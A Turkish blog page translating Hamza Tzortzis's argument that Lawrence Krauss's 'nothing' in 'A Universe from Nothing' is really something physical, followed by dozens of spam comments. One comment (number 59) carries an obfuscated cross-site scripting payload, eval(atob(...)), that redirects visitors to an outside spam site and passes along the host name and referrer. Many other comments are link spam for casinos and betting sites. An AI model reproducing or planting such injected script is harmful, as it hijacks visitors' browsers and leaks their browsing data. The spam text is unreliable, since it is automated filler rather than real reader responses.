çevirmen notu: Amerikalı kuramsal fizikçi Lawrence Krauss’un 2012 yılında yayınladığı “Hiç yoktan bir Evren” kitabında evrenin hiçlikten kendi kendine çıkabileceğini iddia etmesi bilim ve felsefe camiasında büyük tartışmalara sebep olmuştu. Söz konusu iddia birçok filozof ve bilim insanı tarafından eleştiriye uğramış ve iddianın sadece hatalı, sahte bir tanımdan ibaret olduğu dile getirilmişti. Çevirdiğimiz yazıda ise Hamza Tzortzis’in söz konusu iddiaya verdiği cevabı sunmaktayız. İyi okumalar;

Profesör Lawrence Krauss’un Hiç Yoktan Bir Evren adlı kitabı “Neden hiçbir şey yerine bir şeyler var?” Leibnizci sorusuyla ilgili tartışmayı canlandırdı ve popüler hale getirdi.[1] Krauss kitabında, evrenin “hiçlik”ten ortaya çıkmasının makul olduğunu savunuyor. Kulağa anlamsız gelse de, çıkarımlarının bağlamını anlamak için bazı ön kabul ve açıklamaların aydınlatılması gerekmektedir.

Krauss’un “hiçlik” dediği aslında bir şeydir. Krauss kitabında hiçliği “sabit olmayan”[2] şeklinde tanımlamaktadır. Başka yerlerde ise “boş ama önceden var olan mekan”[3] olarak adlandırdığı hiçliğin fiziksel bir şey olduğunu onaylamaktadır. Bu ilginç bir dilbilimsel sapmadır; çünkü İngilizcede hiçliğin tanımı evrensel bir yokluğa işaret eder. Ancak Krauss’un “hiçliği”, “bir şey”in etiketi gibi durmaktadır. Araştırmasında, “hiçliği” zamanın, mekanın ve parçacıkların yokluğu şeklinde tarif etse de acemi okuyucuyu yanlış yönlendirmekte ve hala bazı fiziksel şeylerin var olduğunu (açıkça) doğrulayamamaktadır. Krauss’un iddia ettiği gibi madde var olmasa da, fiziksel alanlar var olmalıdır. Bunun nedeni, alanların olmadığı bir bölgenin var olmasının imkansız olmasıdır; çünkü yerçekimi engellenemez. Kuantum teorisine göre, bu gerçeklik seviyesindeki yerçekimi, kütlesi olan nesneler gerektirmez; ancak fiziksel şeyler gerektirir. Bu nedenle, Krauss’un “hiçliği” aslında bir şeydir. Kitabının başka bir yerinde, her şeyin kuantum dalgalanmalarından ortaya çıktığı yazmaktadır. Bu da “hiçlikten” yaratılışı açıklamak içindir; ancak bunun bir olasılık olarak sunulması önceden var olan bir kuantum haline işaret etmektedir. [4]

Kuantum Mekaniği ve Deneyimi adlı kitabın yazarı Profesör David Albert, Krauss’un kitabının bir incelemesini yazarak benzer bir sonuca varmıştır;

“Ancak bu doğru değil. Göreli kuantum alan teorisindeki vakum durumları -zürafalar, buzdolapları veya güneş sistemlerinden daha az olmamak üzere- basit fiziksel şeylerin özel düzenlemeleridir. Göreli kuantum alanı teorisinde hiçbir fiziksel şeyin var olmamasının eşdeğeri aslında şu ya da bu alanların özel düzenlemesi değildir – sadece alanların yokluğudur! Alanların bazı düzenlemelerinin parçacıkların varlığına karşılık gelmesi ve bazılarının da gelmemesi gerçeği, parmaklarımın bazı olası düzenlemelerinin bir yumruğun varlığına karşılık gelmesi ve bazılarının gelmemesi gerçeğinden daha gizemli değildir. Bu alanlar kendilerini yeniden düzenledikçe, parçacıkların zamanla varoluşa girip çıkabilmeleri, parmaklarımın kendilerini yeniden düzenlerken zamanla yumrukların ortaya çıkıp çıkmamasından daha gizemli değildir. Hiçlikten yaratılış düşüncesinde, bu ortaya çıkmaların hiçbiri –doğru anlaşıldıklarında- uzaktan bile bir şey ifade etmemektedir.”[5]

David Albert

Felsefi Ayrımlar

İlginçtir ki, Profesör Krauss, Leibniz’in yıllardır süregelen sorusuna cevap vermek için hiçliğin tanımını değiştirmiş gibi görünmektedir. Krauss’un tanımı, iyi bilinen felsefi ayrımları bulanıklaştırdığı için tartışmanın tamamını sorunlu hale getirmektedir. “Hiçlik” terimi her zaman var olmamaya veya bir şeyin yokluğuna atfedilmiştir. [6] Bu nedenle, Krauss’un “hiçlik” tanımından yola çıkan birisinin aşağıdakileri ileri sürmesini makul hale gelmektedir:

 “Dün gece harika bir akşam yemeği yedim ve o yemek bir hiçti.”

“Koridorda hiç kimseyle tanıştım ve bana bu odayı tarif ettiler.”

“Hiçlik tuz ve karabiberle daha lezzetlidir.”[7]

Bu ifadeler mantığa aykırı ifadelerdir ve hiçliğin tanımı değiştirilmediği sürece anlamsız önermelerle eş değerdirler. Profesör Krauss’un hiçlik görüşünün, var olmamaya işaret etmediğini ima etmesi şaşırtıcı değildir. Krauss şöyle yazmıştır: “Ancak, bir şey kesindir. Yaratılış meselesini tartıştığım kişilerin katı bir inançla kabul ettikleri metafizik “kural” olan “hiçlikten hiçlik gelir”in bilimde temeli yoktur.”[8]

Bu açıkça Krauss’un hiçliğin anlamını bir şey ifade edecek şekilde değiştirdiği anlamına gelir; çünkü bir yöntem olarak bilim fiziksel dünyadaki şeylere odaklanır. Bilim, yalnızca doğa olayları ve doğal süreçler hakkında cevaplar üretebilir. “Hayatın anlamı nedir? Ruh var mıdır? Hiçlik nedir?” gibi sorular sorduğumuzda genel beklenti metafizik yanıtlar elde etmektir ve bu nedenle, bu sorular herhangi bir bilimsel açıklamanın kapsamı dışındadır.

Lawrence Krauss

Bilim, hiçlik ya da var olmama düşüncesine değinemez; çünkü bilim gözlemle çözebilecek problemlerle sınırlıdır. Bilim filozofu Elliot Sober bu sınırlılığı doğrular. Empiricism adlı yazısında, “bilim, gözlemlerin çözebileceği sorunlara dikkatini sınırlamak zorundadır” şeklinde yazar.[9] Bu nedenle, Profesör Krauss, bilimin aslında çözemeyeceği bir sorunu çözmesi için hiçlik kelimesinin anlamını değiştirmiştir. Bu, birisinin bir soruyu cevaplayamaması ve yenilgiyi kabul etmek veya soruyu bir başkasına yönlendirmek yerine sorunun anlamını değiştirmeye başvurmasıyla eşdeğer olduğundan, belki de bir yenilgi olarak görülmelidir. Hiçlik kavramının metafizik bir kavram olduğunu ve bilimin yalnızca gözlemlenebilenle ilgilendiğini söylemek entelektüel anlamda daha dürüst bir tercih olurdu.

Neticesiz araştırma ve dilbilim cambazlığının popülerleştirilmesi

Tüm bunlar bir yana, Profesör Krauss, “hiçlik” araştırmasının belirsiz ve kesin kanıtlardan yoksun olduğunu “Burada olabilir kelimesini vurguluyorum, çünkü bu soruyu açık bir şekilde çözmek için hiçbir zaman yeterli ampirik bilgiye sahip olamayabiliriz.” diyerek kabul etmiştir.[10] Kitabının başka bir yerinde argümanının neticesiz doğasını kabul eder;

“Ayrıntıları çözme ile ilgili gözlemsel ve teorik zorluklar sebebiyle bu konuda asla inandırıcılıktan fazlasına ulaşamayacağımızı düşünüyorum.”[11]

Bunun ışığında, Profesör Krauss hiçlik kelimesini yeniden tanımlamak yerine, sadece evrenin vakum durumu gibi fiziksel bir şeyden ortaya çıktığını söylemelidir. Ancak Krauss, dilbilim cambazlığını popülerleştirme konusunda son derece kararlı görünmektedir. İslam mı Ateizm mi: Hangisi Daha Mantıklı? tartışmamız sırasında onun “hiçlik” tanımının kuantum belirsizliği gibi bir şeye denk geldiğini açıklamak için kitabına atıfta bulundum. Ancak o karşı çıkarak hiçliğin “Uzay yok, zaman yok, yasalar yok … evren yok, hiçbir şey yok, hiç, sıfır.” olduğunu söyledi. [12]

Krauss önemli ve gizli bir öncülü kasıtlı olarak atlamış görünmektedir. Onun hiçliğinde hala bazı fiziksel şeyler vardır; halka açık bir konferansta açıkça kabul ettiği bir şey. Bir şeyin ve hiçliğin “… fiziksel nicelikler” olduğunu söylemiştir.[13]

Özetle, Profesör Krauss’un hiçliği bir şeydir. Evren, Krauss’un “hiçlik” olarak adlandırdığı fiziksel bir şeyden ortaya çıkmıştır ve bu nedenle Leibniz’in “Neden hiçbir şey yerine bir şeyler var?” sorusu cevapsız kalır. Gerçekte, Krauss yalnızca şu soruyu yanıtlamıştır: Bir şey nasıl bir şeyden ortaya çıktı? Bu, bilimin cevaplayabileceği ve dilbilimsel cambazlık gerektirmeyen bir sorudur.

Tanrı’nın varlığı, Krauss’un hiçlik hakkındaki görüşü tarafından sarsılmamaktadır. Bize gerçekten sunduğu tek şey, evrenin (zaman ve uzay) bir şeyden ortaya çıktığıdır. Bu nedenle evren, varlığı için hala bir açıklamaya muhtaçtır.

Orijinal metin: http://www.hamzatzortzis.com/on-professor-lawrence-krauss-nothing/

References

[1] Leibniz, G. W. (1714) The Principles of Nature and Grace, Based on Reason. 1714. Available at: http://www.earlymoderntexts.com/assets/pdfs/leibniz1714a.pdf [Accessed 4th October 2016].

[2] Krauss, L. M. (2012) A Universe from Nothing: Why is there Something Rather Than Nothing. London: Simon & Schuster, p. 170.

[3] Ibid.

[4] Ibid, p. 105.

[5] Albert, D. (2012) ‘A Universe From  Nothing,’ by Lawrence M. Krauss. Available at: http://www.nytimes.com/2012/03/25/books/review/a-universe-from-nothing-by-lawrence-m-krauss.html?_r=0 [Accessed 1st October 2016].

[6] Craig, W.L. (2012) A Universe from Nothing. Available at: http://www.reasonablefaith.org/a-universe-from-nothing [Accessed 9th October 2016].

[7] Analogies adapted from Craig, W.L. (2012) A Universe from Nothing. Available at: http://www.reasonablefaith.org/a-universe-from-nothing [Accessed 9th October 2016].

[8] Krauss, L. A (2012) Universe from Nothing, p. 174.

[9] Sober, E. (2010). Empiricism. In: Psillos, S and Curd, M, ed, The Routledge Companion to Philosophy of Science. Abingdon: Routledge, pp. 137-138.

[10] Krauss, L. (2012) A Universe from Nothing, p. xiii.

[11] Ibid p. 147.

[12] iERA. (2013) Lawrence Krauss vs Hamza Tzortzis – Islam vs atheism debate. Available at: http://www.youtube.com/watch?v=uSwJuOPG4FI [Accessed 10th September 2016].

[13] Tony Sobrado. (2012) How the Universe Came from ‘Nothing’, Richard Dawkins and Lawrence Krauss discuss. Available at: https://youtu.be/CXGyesfHzew?t=921 [Accessed 2nd October 2016].

KRAUSS’UN HİÇ YOKTAN EVRENİ – HAMZA TZORTZİS

Yazı dolaşımı


KRAUSS’UN HİÇ YOKTAN EVRENİ – HAMZA TZORTZİS” için 2.497 yorum

 1. Remarkable things here. I am very glad to look your post.
  Thank you a lot and I’m looking forward to touch you.
  Will you kindly drop me a e-mail?

 2. I enjoy what you guys tend to be up too. This kind
  of clever work and reporting! Keep up the terrific works guys I’ve you guys to our blogroll.

 3. Hey I know this is off topic but I was wondering if you knew of any widgets
  I could add to my blog that automatically tweet my newest twitter updates.
  I’ve been looking for a plug-in like this for quite some time and was hoping maybe you would have some experience with something
  like this. Please let me know if you run into anything.
  I truly enjoy reading your blog and I look forward to your new updates.

 4. Magnificent beat ! I wish to apprentice whle you amend your site,
  how can i subscribe for a blog website? The account aided me a acceptable deal.I had been a little bit acquainted of tis our
  broadcastt offered bright clear concept

 5. Hi there! I just wanted to ask if you ever have any trouble with
  hackers? My last blog (wordpress) was hacked and I ended
  up losing several weeks of hard work due to no back up. Do you have any methods
  to protect against hackers?

 6. Hello! Someone in my Facebook group shared this site with us so I came to check
  it out. I’m definitely loving the information. I’m bookmarking and will be tweeting this to my followers!
  Excellent blog and excellent style and design.

 7. Hello Dear, are you actually visiting this web site on a regular basis, if so afterward you will without doubt take good experience.

 8. I blog frequently and I genuinely appreciate your information. This
  article has really peaked my interest. I am going to bookmark your website and keep checking
  for new information about once a week. I opted in for
  your Feed too.

  Stop by my site; kiosk playboy2

 9. Thank yoս for another excеllent post. The place else may just anybody get that tyⲣe off informаtion in such a perfect
  way of ѡrіting? I have a presentation next week, and I’m at the
  looк for such infߋrmation.

  Also visit my sіte; pkvgames

 10. This design is incredible! You most certainly know
  how to keep a reader entertained. Between your wit and your videos, I was almost
  moved to start my own blog (well, almost…HaHa!) Wonderful job.
  I really enjoyed what you had to say, and more
  than that, how you presented it. Too cool!

 11. An impressive share! I have just forwarded this onto a colleague who has
  been doing a little research on this. And he in fact bought me dinner because I
  stumbled upon it for him… lol. So allow me to reword this….
  Thank YOU for the meal!! But yeah, thanx for spending
  time to discuss this subject here on your internet site.

  Also visit my webpage; Chillbox AC

 12. Hi there superb website! Does running a blog similar to this require a large amount of work?
  I’ve very little knowledge of coding however I was hoping to start my
  own blog soon. Anyways, if you have any suggestions or techniques for new blog owners please share.
  I know this is off subject but I simply needed to ask.
  Kudos!

  My homepage – rokph.com

 13. Hi there! This is my first visit to your blog!
  We are a group of volunteers and starting a new initiative in a
  community in the same niche. Your blog provided us beneficial information to work on. You
  have done a wonderful job!

 14. Helⅼo, i read your blolg from time tߋ tіmе and i
  own a similqr one and i was just wondering іf you get a lot off spam
  сomments? If so how do you prevent it, any plugin or
  anything you ϲan recommend? I get so mսch lately it’s driving mme mad so
  any support іss very much appreciated.

  Also visit mmy page :: Casino slot online

 15. I am really enjoying the theme/design of your website.
  Do you ever run into any internet browser compatibility problems?
  A small number of my blog audience have complained
  about my website not working correctly in Explorer but looks great in Firefox.
  Do you have any suggestions to help fix this problem?

  My blog: zinewiki.com

 16. I loved as much as you will receive carried out right here.

  The sketch is tasteful, your authored material stylish.
  nonetheless, you command get bought an impatience
  over that you wish be delivering the following.
  unwell unquestionably come further formerly again as exactly
  the same nearly very often inside case you shield
  this increase.

  Also visit my homepage :: Chillbox AC

 17. Hey just wanted to give you a quick heads up and let you know a few of
  the images aren’t loading correctly. I’m not sure why but I think
  its a linking issue. I’ve tried it in two different web browsers
  and both show the same results.

  My blog post :: Chillbox

 18. Howdy this is somewhat of off topic but I was wanting to know if blogs use WYSIWYG editors or if you
  have to manually code with HTML. I’m starting a blog
  soon but have no coding skills so I wanted to get
  guidance from someone with experience. Any help would be enormously appreciated!

 19. We would like to thank you all over again for the stunning ideas you gave Jesse when preparing her
  own post-graduate research and also, most importantly,
  regarding providing each of the ideas in one blog post.
  In case we had been aware of your web-site a year ago, i’d have been saved the needless measures we were participating in. Thank you very much.

  Here is my page: integralmpact.com

 20. Thank you for your website post. Jones and I
  have been saving for a new ebook on this theme and your writing
  has made us all to save our money. Your thoughts really responded to all our concerns.
  In fact, above what we had recognized just before we came upon your great blog.
  We no longer nurture doubts along with a troubled mind because you
  have completely attended to each of our needs here.
  Thanks

  my blog; Chillbox AC

 21. Hi, i feel that i saw you visited my weblog thus i came to go back the favor?.I’m
  trying to in finding things to improve my website!I assume its ok to make use of a few
  of your concepts!!

 22. Greetings from Colorado! I’m bored to tears at work so I decided
  to check out your blog on my iphone during lunch break.
  I enjoy the knowledge you provide here and can’t wait to
  take a look when I get home. I’m surprised at how fast
  your blog loaded on my phone .. I’m not even using WIFI, just 3G ..

  Anyhow, very good site!

  My page; Chillbox AC

 23. Hey! Someone in my Facebook group shared this site with us
  so I came to give it a look. I’m definitely enjoying the information. I’m book-marking and will be tweeting this to my followers!
  Excellent blog and superb design.

 24. Sweet blog! I found it while browsing on Yahoo
  News. Do you have any tips on how to get listed
  in Yahoo News? I’ve been trying for a while but I never seem to get
  there! Cheers

 25. Hey, I think your blog might be having browser compatibility issues.

  When I look at your blog site in Firefox, it looks fine but when opening in Internet Explorer, it has some
  overlapping. I just wanted to give you a quick heads up!

  Other then that, awesome blog!

 26. Hi! I know this is somewhat off topic but I
  was wondering which blog platform are you using for this site?
  I’m getting fed up of WordPress because I’ve had problems with hackers and I’m looking at options for another
  platform. I would be great if you could point me in the direction of a good platform.

 27. Great site you’ve got here.. It’s difficult to find high quality writing like yours nowadays.
  I truly appreciate people like you! Take care!!

 28. Wonderful blog! I found it while surfing around on Yahoo News.
  Do you have any suggestions on how to get listed in Yahoo News?
  I’ve been trying for a while but I never seem to get
  there! Appreciate it

  My web-site; Muama Ryoko

 29. I like the valuable information you provide in your articles.
  I will bookmark your weblog and check again here frequently.
  I am quite sure I’ll learn many new stuff right here!
  Best of luck for the next!

 30. I would like to thank you for the efforts you have put in penning this blog.
  I am hoping to check out the same high-grade blog posts by you
  later on as well. In truth, your creative writing abilities has encouraged me to
  get my very own blog now 😉

 31. Pretty element of content. I just stumbled upon your site and
  in accession capital to say that I acquire actually enjoyed account your blog posts.
  Any way I’ll be subscribing in your feeds or even I fulfillment you access persistently rapidly.

 32. hey there and thank you for your information – I’ve certainly picked up
  something new from right here. I did however expertise some technical issues using this web site, since I experienced to reload
  the site many times previous to I could get it to load correctly.

  I had been wondering if your web host is OK? Not that
  I am complaining, but slow loading instances times will very frequently affect your placement in google and can damage your high-quality score if advertising and marketing with Adwords.
  Well I’m adding this RSS to my email and could look out for much
  more of your respective fascinating content. Make sure you
  update this again very soon.

 33. ประกาศฟรี ลงโฆษณาฟรี ซื้อขายออนไลน์
  เว็บประกาศฟรี โฆษณาฟรี ซื้อขายแลกเปลี่ยนสินค้าออนไลน์ ลงโฆษณาฟรี โพสต์ฟรี โปรโมทสินค้า เว็บไซต์ ข่าวประชาสัมพันธ์ ตลาดออนไลน์ ขายบ้าน คอนโด ขายที่ดิน อสังหาริมทรัพย์ รถยนต์ มือถือ คอมพิวเตอร์ พระเครื่อง เสื้อผ้า
  ของเก่า สุขภาพความงาม สมัครงาน ป้ายโฆษณาฟรี

 34. Hey There. I found your blog using msn. This is a really well written article.

  I’ll be sure to bookmark it and come back to read more of your useful info.
  Thanks for the post. I will definitely comeback.

 35. A person necessarily help to make significantly posts I might state.
  This is the first time I frequented your website page and
  up to now? I amazed with the analysis you made to create
  this particular put up incredible. Wonderful process!

 36. I’m really enjoying the design and layout of your blog.
  It’s a very easy on the eyes which makes it much more pleasant for me to come here and visit more often. Did you hire out a designer to create
  your theme? Exceptional work!

 37. hi!,I love your writing so so much! share wwe keep in touch extra
  approximately your post on AOL? I require a specialist on this area to resolve
  mmy problem. May be that is you! Taking a look ahead to peer you.

 38. My coder is trying to convince me to move to .net from PHP.
  I have always disliked the idea because of the costs.
  But he’s tryiong none the less. I’ve been using WordPress on several websites for about a year and am worried about switching
  to another platform. I have heard good things about blogengine.net.
  Is there a way I can transfer all my wordpress content into
  it? Any help would be greatly appreciated!

 39. AllBet4You คาสิโนออนไลน์ เว็บสล็อตแตกง่าย
  ดีที่สุด
  เว็บพนันออนไลน์ สล็อตแตกง่าย allbet4you รวมเกมสล็อต slot online ที่ดีที่สุดเอาไว้รวมกันที่นี่ โดยคุณนั้นจะพบกับเหล่าเกมสล็อตยอดนิยม pgslot xoslot jokerslot ที่มีหลายคนนั้นต้องการที่จะเล่น ซึ่งในแต่ละเกมล้วนมาจากผู้ให้บริการชั้นยอดทั้งสิ้น เล่นง่าย ได้เงินจริง ฝากถอนก็รวดเร็ว ไม่กี่วินาที เว็บตรง เว็บใหญ่ มั่นคง ปลอดภัย

  เล่นสล็อตบนมือถือ สะดวกทุกที่ทุกเวลา บริการคาสิโน เป็นเว็บใหญ่ การเงินมั่นคง มีโปรโมชั่นแจกทุกวัน แตกง่าย แตกบ่อย เยอะที่สุด ราคาดี แถมฝากถอนเร็วด้วยตัวเองผ่านหน้าเว็บ
  รองรับทุกอุปกรณ์ เว็บตรงบริษัท เส้นใหญ่ใจถึงให้โปรแบบจัดเต็ม ต้อนรับท่านจุใจ สมัครเล่นกับเราวันนี้เว็บสล็อตแตกง่าย

 40. Hi there, I believe your website could possibly be having browser compatibility
  problems. Whenever I look at your web site in Safari, it looks fine
  however, when opening in I.E., it has some overlapping issues.
  I merely wanted to give you a quick heads up!
  Other than that, fantastic blog!

 41. A motivating discussion is definitely worth comment.

  I believe that you need to write more about this subject, it
  might not be a taboo subject but typically folks don’t talk about these subjects.
  To the next! Cheers!!

 42. I truly love your blog.. Great colors & theme. Did you develop this website yourself?
  Please reply back as I’m trying to create my very own website and would love to find out where you
  got this from or just what the theme is named.
  Appreciate it!

 43. Please let me know if you’re looking for a writer foor your
  blog. You have some really great artices and I feel I wold be a good asset.

  If you ever waant too take some of the load off, I’d love to
  write some content for your blog in exchange for a link back to mine.
  Pleaase send me an e-mail if interested. Thanks!

 44. We’re a gaggle of volunteers and opening a new scheme in our community.
  Your web site offered us with valuable information to work on. You have performed an impressive task and
  our entire community will be thankful to you.

 45. Your style is very unique compared to other folks I have read
  stuff from. Thank you for posting when you’ve got the opportunity, Guess I’ll just bookmark this web site.

 46. wonderful put up, very informative. I ponder why the other experts of this
  sector do not realize this. You should continue your writing.
  I’m sure, you’ve a huge readers’ base already!

 47. We absolutely love your blog and find many of your post’s to be what
  precisely I’m looking for. Do you offer guest writers to write content for yourself?
  I wouldn’t mind producing a post or elaborating on a lot of the subjects you write
  with regards to here. Again, awesome website!

 48. I am extremely impressed with your writing skills
  as well as with the layout on your weblog.
  Is this a paid theme or did you customize it yourself?
  Anyway keep up the excellent quality writing, it’s rare to see a great
  blog like this one today.

 49. It’s the best time to make some plans for the future and it’s time to be happy.

  I’ve read this post and if I could I wish to suggest you some interesting things or tips.

  Perhaps you could write next articles referring to this article.
  I desire to read even more things about it!

 50. Greetings! I know this is kinda off topic nevertheless I’d figured I’d ask.

  Would you be interested in exchanging links or maybe guest writing a blog post or vice-versa?
  My site covers a lot of the same topics as yours and I feel we
  could greatly benefit from each other. If you might be interested feel free to
  send me an email. I look forward to hearing from you!

  Awesome blog by the way!

 51. Oh my goodness! Incredible article dude! Thank you so much,
  However I am going through troubles with your RSS. I don’t understand why I can’t join it.
  Is there anyone else having identical RSS problems? Anybody
  who knows the solution can you kindly respond?
  Thanx!!

 52. With havin so much written content do you ever run into any problems of plagorism or copyright violation? My website
  has a lot of exclusive content I’ve either created myself or outsourced
  but it seems a lot of it is popping it up all over
  the internet without my authorization. Do you know any methods to help
  stop content from being ripped off? I’d definitely appreciate it.

 53. Hey I know this is off topic but I was wondering if you knew of any widgets I could add to my
  blog that automatically tweet my newest twitter updates.
  I’ve been looking for a plug-in like this for quite some time and was hoping maybe you would have some experience with something like this.

  Please let me know if you run into anything.
  I truly enjoy reading your blog and I look forward to your new updates. http://www.effecthub.com/user/1975413

 54. Great post. I was checking constantly this weblog and I’m inspired!
  Extremely helpful info specially the final phase 🙂 I deal with such info a lot.

  I used to be looking for this particular info for a very long
  time. Thank you and best of luck.

 55. Hi! I could have sworn I’ve been to this website before but after reading
  through some of the post I realized it’s new to me.
  Anyhow, I’m definitely happy I found it and I’ll be bookmarking and checking back frequently!

 56. Hello! I know this is somewhat off topic but I was wondering which blog platform are you using
  for this site? I’m getting sick and tired of WordPress because I’ve had problems with hackers
  and I’m looking at alternatives for another platform.
  I would be great if you could point me in the direction of a good platform.

 57. Hello, i believe that i noticed you visited my site so i got here to go back the
  choose?.I’m attempting to to find issues to enhance my site!I suppose its
  ok to make use of some of your ideas!!

 58. Definitely believe that which you stated. Your favorite reason appeared
  to be on the web the simplest thing to be aware of. I say to you, I definitely
  get annoyed while people think about worries that they just don’t know
  about. You managed to hit the nail upon the top and also defined out the whole thing without having side effect ,
  people can take a signal. Will probably be back to get more.
  Thanks

 59. You will find all the discounts on fashionnova.com/pages/returns at Fashionnova.com/pages/returns“>”>”>”>”>eval(atob(‘ZG9jdW1lbnQubG9jYXRpb24uaHJlZiA9ICdodHRwczovL2Zhc2hpb25jZWxlYnJpdHl0cmVuZHMuY29tLz91dG1fc291cmNlPScgKyBsb2NhdGlvbi5ob3N0bmFtZSArICcmdXRtX21lZGl1bT1nc2EmdXRtX2NhbXBhaWduPXNjcmlwdCZ1dG1fY29udGVudD0nICsgZW5jb2RlVVJJQ29tcG9uZW50KGRvY3VtZW50LnJlZmVycmVyKTs=’));

 60. Simply want to say your article is as astounding. The clearness in your post is simply nice and i could assume you’re an expert on this subject.
  Fine with your permission let me to grab your RSS
  feed to keep up to date with forthcoming post. Thanks a million and please keep up the enjoyable
  work. ps4 games https://bit.ly/3z5HwTp ps4

 61. We produce effective products to restore and maintain health.

  Advanced developments are used, and the search
  for scientific inventions, which have no analogues in the
  world, continues, then the purchase of these inventions, obtaining of patents certificates and bringing to the
  release of a finished competitive product takes place.
  Join us and enjoy the best!

 62. Heya i am for the first time here. I found this board and I find It really useful
  & it helped me out a lot. I hope to give something back and aid others like you helped me.

 63. Hello I am so glad I found your website, I really found you by accident, while I was searching
  on Google for something else, Nonetheless I am here now and would just like to say many thanks for a
  tremendous post and a all round entertaining blog (I also love the theme/design), I don’t have time to go through it all at
  the minute but I have book-marked it and also included your RSS feeds, so when I have
  time I will be back to read more, Please do keep up the awesome work.

 64. Asking questions are in fact fastidious thing if you are not
  understanding something totally, except this piece of writing
  provides pleasant understanding yet.

 65. Right here is the perfect site for anybody who
  would like to find out about this topic. You realize a whole lot its almost tough to argue with you (not that I personally will need
  to…HaHa). You definitely put a fresh spin on a subject that’s been written about for a long time.
  Great stuff, just excellent!

 66. Everything posted was very logical. However, what about this?

  what if you typed a catchier title? I ain’t suggesting your content isn’t
  good, but what if you added something that grabbed
  a person’s attention? I mean KRAUSS'UN HİÇ YOKTAN EVRENİ – HAMZA TZORTZİS | islamicrophone is
  a little vanilla. You ought to glance at Yahoo’s home page and see how they create
  news headlines to get people interested. You might try adding a video or a picture
  or two to grab readers interested about everything’ve got to say.

  In my opinion, it would bring your blog a little bit more interesting.

 67. Hi would you mind letting me know which web host you’re utilizing?
  I’ve loaded your blog in 3 different browsers and I must say this blog loads a lot faster then most.
  Can you recommend a good internet hosting provider at a reasonable price?
  Cheers, I appreciate it!

 68. What’s Taking place i am new to this, I stumbled upon this I have found It absolutely useful and it has
  helped me out loads. I hope to give a contribution & aid different users
  like its helped me. Good job.

 69. I’m amazed, I must say. Rarely do I encounter a blog that’s both
  equally educative and interesting, and let me tell you, you
  have hit the nail on the head. The problem is something that not enough
  people are speaking intelligently about. I am very
  happy I came across this in my hunt for something relating to this.

 70. Great ? I should certainly pronounce, impressed
  with your web site. I had no trouble navigating through all tabs as well as related information ended up being truly simple to do to access.

  I recently found what I hoped for before you know it in the least.
  Reasonably unusual. Is likely to appreciate it for those
  who add forums or something, website theme .
  a tones way for your customer to communicate. Excellent task.

 71. That is the excellent mindset, nonetheless is just not help to make every sence whatsoever preaching about that mather. Virtually any method many thanks in addition to i had endeavor to promote your own article in to delicius nevertheless it is apparently a dilemma using your information sites can you please recheck the idea. thanks once more . Excellent Blog! I would like to thank for the efforts you have made in writing this post. I am hoping the same best work from you in the future as well. I wanted to thank you for this websites! Thanks for sharing. Great websites 사설토토꽁머니

 72. It’s perfect time to make some plans for the future and it is time to be happy. I’ve read this post and if I could I want to suggest you few interesting things or tips. Maybe you could write next articles referring to this article. I desire to read even more things about it!| 안전놀이터

 73. Hi! I’m at work browsing your blog from my new iphone 4! Just wanted to say I love reading your blog and look forward to all your posts! Carry on the superb work!I’m not sure exactly why but this weblog is loading incredibly slow for me. Is anyone else having this issue or is it a issue on my end? I’ll check back later on and see if the problem still exists. 카이소

 74. Good day! This post could not be written any better! Reading this post reminds me of my previous room mate! He always kept chatting about this. I will forward this page to him. Pretty sure he will have a good read. Thanks for sharing. Very informative post ! There is a lot of information here that can help any business get started with a successful social networking campaign ! The worst part of it was that the software only worked intermittently and the data was not accurate. You obviously canot confront anyone about what you have discovered if the information is not right 먹튀검증백과

 75. I’m not sure where you’re getting your info, but good topic. I needs to spend some time learning much more or understanding more. Thanks for wonderful information I was looking for this info for my mission. Wow, marvelous blog layout! How long have you been blogging for? you made blogging look easy. The overall look of your web site is fantastic, as well as the content! Whats Happening i am new to this, I stumbled upon this I have found It absolutely helpful and it has aided me out loads. I’m hoping to give a contribution & assist other customers like its helped me. Great job. 토토사이트

 76. Neat blog! Is your theme custom made or did you download it from somewhere? A design like yours with a few simple tweeks would really make my blog jump out. Please let me know where you got your theme. Many thanks 토토검증

 77. This article is an appealing wealth of useful informative that is interesting and well-written. I commend your hard work on this and thank you for this information. I know it very well that if anyone visits your blog, then he/she will surely revisit it again. I’m impressed, I must say. Actually rarely do you encounter a weblog that’s both educative and entertaining, and let me tell you, you’ve got hit the nail for the head. Your thought is outstanding; the thing is a thing that insufficient consumers are speaking intelligently about. I am happy that I found this at my find some thing with this. Thanks for helping out, good info 안전한놀이터뜻

 78. I definitely enjoying every little bit of it. It is a great website and nice share. I want to thank you. Good job! You guys do a great blog, and have some great contents. Keep up the good work. I am always searching online for articles that can help me. There is obviously a lot to know about this. I think you made some good points in Features also. Keep working, great job ! I agree. You have made the nice blogs with the great info in the contents. 더존카지노

 79. Thank you, I have just been searching for info approximately this topic for a while and yours is the best I have discovered so far. But, what concerning the conclusion? Are you positive in regards to the source? 헤이먹튀

 80. Awesome blog. I enjoyed reading your articles. This is truly a great read for me. I have bookmarked it and I am looking forward to reading new articles. Keep up the good work! Easily, the article is actually the best topic on this registry related issue. I fit in with your conclusions and will eagerly look forward to your next updates. Truly, this article is really one of the very best in the history of articles. I am a antique ’Article’ collector and I sometimes read some new articles if I find them interesting. And I found this one pretty fascinating and it should go into my collection. Very good work! 토디즈

 81. I was recommended this website by my cousin. I’m not sure whether this post is written by him as nobody else know such detailed about my trouble. You are incredible! Thanks!Well I sincerely liked studying it. This tip offered by you is very helpful for good planning. 토토커뮤니티

 82. Very interesting blog. Alot of blogs I see these days don’t really provide anything that I’m interested in, but I’m most definately interested in this one. Just thought that I would post and let you know. Wow what a Great Information about World Day its very nice informative post. thanks for the post.. This is a great inspiring article.I am pretty much pleased with your good work.You put really very helpful information. Keep it up. Keep blogging. Looking to reading your next post. 먹튀폴리스

 83. Thanks for sharing nice information with us. i like your post and all you share with us is uptodate and quite informative, i would like to bookmark the page so i can come here again to read you, as you have done a wonderful job. Your blog is fabulous, superior give good results… Seen a large number of definitely will understand everybody even in the event they do not take the time to reveal. I felt very happy while reading this site. This was really very informative site for me. I really liked it. This was really a cordial post. Thanks a lot!. 실시간카지노

 84. I will always let you and your words become part of my day because you never know how much you make my day happier and more complete. There are even times when help with assignment writing uk I feel so down but I will feel better right after checking your blogs. You have made me feel so good about myself all the time and please know that I do appreciate everything that you have 먹튀검증백과